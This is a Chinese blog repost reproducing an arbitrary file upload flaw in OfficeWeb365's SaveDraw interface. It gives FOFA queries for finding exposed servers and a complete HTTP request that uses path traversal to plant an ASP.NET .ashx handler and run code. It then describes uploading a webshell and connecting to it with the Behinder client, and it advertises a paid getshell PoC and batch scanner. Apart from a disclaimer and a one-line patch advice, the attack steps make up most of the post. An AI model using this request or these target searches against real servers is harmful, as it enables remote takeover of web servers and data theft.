首页 > 系统相关 >【漏洞复现】OfficeWeb365 SaveDraw 任意文件上传getshell漏洞

【漏洞复现】OfficeWeb365 SaveDraw 任意文件上传getshell漏洞

时间:2024-12-03 09:32:48浏览次数:6  
标签:SaveDraw OfficeWeb365 Web System Content 漏洞 上传

免责声明

请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、简介

OfficeWeb365 是一款专业的云服务平台,专注于提供 Office 文档和 PDF 文档的在线预览功能,支持 Microsoft Word、Excel、PowerPoint,WPS 系列(文字、表格、演示)以及 Adobe PDF 的在线预览。该服务无需安装 ActiveX 控件或客户端部署,即可兼容所有浏览器和移动设备,为用户提供便捷高效的办公文档在线预览体验。
在这里插入图片描述

二、漏洞描述

OfficeWeb365 的 SaveDraw 接口 存在任意文件上传漏洞,攻击者可利用该漏洞上传任意文件到服务器,从而获取服务器权限。通过此漏洞,攻击者可以直接上传恶意的 webshell 文件,对服务器进行控制,进一步获取对整个 Web 服务器的完全掌控。

三、fofa语法

body="请输入furl参数"
header="OfficeWeb365"
banner="OfficeWeb365"

三、漏洞复现

发送数据包,计算7* 8的值,计算结果写入文件drawPW1.ashx中

POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 480

data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler
{
public void ProcessRequest(System.Web.HttpContext context)
{
System.Web.HttpResponse response = context.Response;
response.Write(7 * 8);

string filePath = context.Server.MapPath("/") + context.Request.Path;
if (System.IO.File.Exists(filePath))
{
    System.IO.File.Delete(filePath);
}
}
public bool IsReusable
{
get { return false; }
}
}///---

在这里插入图片描述
访问http://ip/Content/img/UserDraw/drawPW1.ashx,查看命令执行结果,成功写入7*8的值56

在这里插入图片描述
上传shell文件,然后冰蝎连接http://ip/Content/img/UserDraw/drawPW11.aspx

getshell poc请在公众号知识星球获取

在这里插入图片描述
批量检测(批量检测POC工具请在公众号知识星球获取):
在这里插入图片描述

四、修复建议

1、打补丁


[原文始发于微信公众号(白帽攻防):【漏洞复现】OfficeWeb365 SaveDraw 任意文件上传getshell漏洞

标签:SaveDraw,OfficeWeb365,Web,System,Content,漏洞,上传
From: https://blog.csdn.net/m0_46381222/article/details/144199821

相关文章

  • 【漏洞复现】Bazaar 任意文件读取漏洞(CVE-2024-40348)
    免责声明请勿使用本文中提到的技术进行非法测试或行为。使用本文中提供的信息或工具所造成的任何后果和损失由使用者自行承担,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。一、简介Bazaar是一个强大的分布式版本控制系统,旨在帮助开发者记录项目的历史......
  • 修复snakeyaml漏洞,与maven打包二三事
    1.背景snakeyaml:1.33被扫描出漏洞,需要升级版本;升级版本后发现与spring-boot-nacos-starter依赖的snakeyaml不兼容;java.lang.NoSuchMethodError:org.yaml.snakeyaml.constructor.Constructor:method<init>()Vnotfound参照网上的方法重写几个类以及无参构造函数,成功解决......
  • 5-文件上传漏洞
    1、文件上传漏洞原理1.1一句话木马<?php@eval($_POST['xu']);?>其中@表示忽略错误,eval()函数表示把传进去的字符串作为php代码执行从httppost里面拿到参数叫xu的value,然后作为代码去执行,并忽略错误2、Webshell介绍一句话木马、大马、小马、图片马都是webshell中的一种......
  • 【WEB漏洞】并发漏洞+经典案例
    一、简单介绍1.1并发漏洞概述1.2并发漏洞常出现的功能点及解决方法1.2.1用户注册/账户管理1.2.2秒杀/抢购功能1.2.3支付与结算1.2.4文件读写1.2.5日志记录1.2.6缓存更新1.2.7任务调度......
  • 万能门店小程序 onepic_uploade 任意文件上传漏洞复现
    0x01产品描述: ‌     万能门店小程序‌是一个为多行业商家提供一站式解决方案的小程序平台,支持多行业使用,具备强大的线上线下融合能力。它通过后台一键切换版本和一键扫码上传功能,简化了小程序的开发和审核流程,无需登录开发者工具即可提交审核‌。0x02漏洞描述: ......
  • 文件上传漏洞&靶场通关详解
    文件上传漏洞&靶场通关详解什么是文件上传漏洞?大部分网站都拥有上传文件的部分,文件上传漏洞是由于网站开发者对用户上传文件的过滤不够严格,攻击者可以通过这些漏洞上传可执行文件(如木马,恶意脚本和WebShell等等),从而达到随意控制网站的目的。文件上传漏洞有哪些危害?攻击......
  • PhPMyadmin-漏洞复现
    前情条件是:首先将我们的PHP版本设置在5.5以上注:禁止用于未授权的测试!首先搭建环境,登录后台 点击》》SQL 查看当前的日志状态SHOWVARIABLESLIKE'general%';因为之前我原来做过所以general_log是开启的,如果vlau是OFF时,可以使用setglobalgeneral_log......
  • (SAST检测规则-1)Android - 权限管理漏洞
    所属分类:Android-权限管理漏洞缺陷详解:应用未正确实施最小权限原则或滥用已声明的权限可能导致敏感信息泄露。例如,恶意代码利用已授予的权限绕过用户授权,访问通讯录、位置、短信等敏感资源。部分开发者还可能滥用权限以执行不必要的操作,违反用户隐私或安全性。导致结果和风险......
  • #渗透测试#SRC漏洞挖掘#红蓝攻防#黑客工具之Burp Suite介绍02-如何破解(中英对比)
    免责声明本教程仅为合法的教学目的而准备,严禁用于任何形式的违法犯罪活动及其他商业行为,在使用本教程前,您应确保该行为符合当地的法律法规,继续阅读即表示您需自行承担所有操作的后果,如有异议,请立即停止本文章读。                             ......
  • 渗透测试0day漏洞库-威胁情报库-每日更新1day 0day漏洞通知
    近期漏洞合集早加入早享受即将涨价至169元......